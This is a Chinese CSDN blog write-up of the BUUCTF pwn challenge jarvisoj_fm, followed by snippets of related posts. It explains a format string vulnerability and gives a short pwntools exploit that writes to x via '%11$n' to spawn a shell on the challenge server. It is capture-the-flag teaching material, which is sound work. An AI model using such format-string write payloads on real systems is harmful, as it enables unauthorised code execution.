BUUCTF-jarvisoj_fm1-WP

最新推荐文章于 2025-01-21 17:45:14 发布

原创最新推荐文章于 2025-01-21 17:45:14 发布 · 382 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #linux

BUUCTF 专栏收录该内容

34 篇文章

订阅专栏

博客围绕Linux安全展开，介绍了checksec、IDA和EXP相关内容。checksec方面，存在canary且题目提示fm时考虑格式化字符串；IDA中发现main函数有明显格式化字符串漏洞，将x值赋为4可getshell，确定x在第11个位置后编写脚本。

1.checksec

有canary ,题目提升fm,考虑格式化字符串

2.IDA

1.main

明显的格式化字符串漏洞

将x值赋为4就可以getshell

确定x的位置

参数在第11个位置

x的地址,然后编写脚本,挺简单的

3.EXP

#!/usr/bin/env python
from pwn import *
p=remote("node4.buuoj.cn",29539)
elf=ELF('./24fm')
x_addr=0x0804a02c
payload=p32(x_addr)+'%11$n'
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【CTF】jarvisoj_fm 1

凉水的博客

07-06

675

jarvisoj_fm

jarvisoj_fm【BUUCTF】

qq_41696518的博客

08-31

431

jarvisoj_fm【BUUCTF】

1 条评论您还未登录，请先登录后发表或查看评论

jarvisoj_fm

m0_52231248的博客

11-15

529

jarvisoj_fm Checksec： Ida：很明显的格式化字符串漏洞并且我们将x修改为4程序就会给我们调用system函数偏移gdb .%p都能确定，利用方式%$n，pwntools的fmstr模块都行可以看我之前写的pwn5 的wp有详细说 Exp： Flag： ...

JarvisOJ fm

PLpa的博客

07-09

1238

这一题是一道格式化字符串漏洞题关于格式化漏洞的基础，你可以看我前面的博客，里面有提到：https://blog.youkuaiyun.com/qq_43986365/article/details/94896862 拿到这一题，我们仍然是先查看保护：我们可以看到，简单的格式化漏洞题只开了NX和CANARY保护，好的。接下来我们就可以进入IDA中看一下程序的具体逻辑：在这里，我们可以看到有一个明显的...

BUUCTF jarvisoj_fm

2401_88087539的博客

01-21

310

pwn新手小白，写完题后整理的一点点思路，有借鉴其他wp，有任何问题各位师傅可以提出，接收批评指正

[PWN] BUUCTF jarvisoj_fm

空城惜梦的博客

06-05

490

[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro，canary,nx 执行程序，观察程序的逻辑，在打印出输入的字符后，会打印出3! 32IDA打开查看主要函数main，观察到在红框那里存在的很明显的格式化字符串漏洞，而且当x==4时，会得到flag，根据之前执行的程序可知，未修改x之前x的值为3，则若要修改x，需要利用格式化字符串漏洞的任意地址读写解题思路利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",

BUUCTF pwn——jarvisoj_fm

CNS-Enterprise BCC-1701-J

04-13

314

BUUCTF 做题练习

[BUUCTF]PWN——jarvisoj_fm

mcmuyanga的博客

10-31

1582

jarvisoj_fm 附件步骤：例行检查，32位，开启了canary和nx保护运行一下程序，看看大概的情况 32位ida载入，shift+f12检索程序里的字符串，看见了 " /bin/sh " 字符串 双击跟进，找到程序主体，当x=4的时候会执行system（/bin/sh）第10行存在格式化字符串漏洞，我们可以利用它随意读写的特性让x=4 x_addr=0x804A02C 来找一下输入点的参数在栈上存储的位置，手动输入计算得到偏移为11 利用x的地址配合上%11

BUUCTF：jarvisoj_fm（write up）

qq_44768749的博客

08-24

552

BUUCTF：jarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析开启了栈不可执行、canary以及部分RELRO保护 0x02 运行运行未发现什么异常，但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单，关键部分都在主函数中，有getshell的函数，当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3，需要利用格式化字符串漏洞改写x的值测试格式

buuctf jarvisoj_fm

pondzhang的专栏

03-19

370

存在格式化字符串漏洞而实际上x的值为3 需要通过格式化字符串漏洞来重写x的值使用aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x测试格式化字符串漏洞长度 格式化字符串的漏洞的任意写地址长度为11。可以使用$n来写地址中的数据。使用%11$n，意思将0x0804A02C的x地址写入32位大小的一个...

buuctf jarvisoj_fm

carol2358的博客

05-04

276

先运行， AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x 得出是第11位，然后p32(x_addr)正好变成4位 from pwn import * r = remote('node3.buuoj.cn', 27373) x_addr = 0x0804A02C p = flat([x_addr, '%1...

jarvisoj_fm 1 格式化字符串漏洞

m0_49766582的博客

06-01

272

1 from pwn import * 2 p = remote("node3.buuoj.cn",29263) 3 payload = p32(0x0804A02C)+b"%11$n" 4 p.sendline(payload) 5 p.interactive() ~ 需要覆盖x的值，将x的值变为4，利用格式化字符串漏洞。

BUUCTF ciscn_2019_ne_5 & jarvisoj_fm

红叶的博客

11-01

836

只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。

jarvisoj_fm1解题

2301_81504456的博客

07-10

303

BUUCTF解题

BUUCTF 刷题 jarvisoj_fm

Helloity的博客

02-13

447

题目：BUUCTF在线评测 checksec一下，32位程序，有canary，开NX Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) 放到ida里f5一下，发现一个明显的printf格式化字符串漏洞，我们需要控制x的值为4，就可以获得binsh int __cd

jarvisoj_fm 1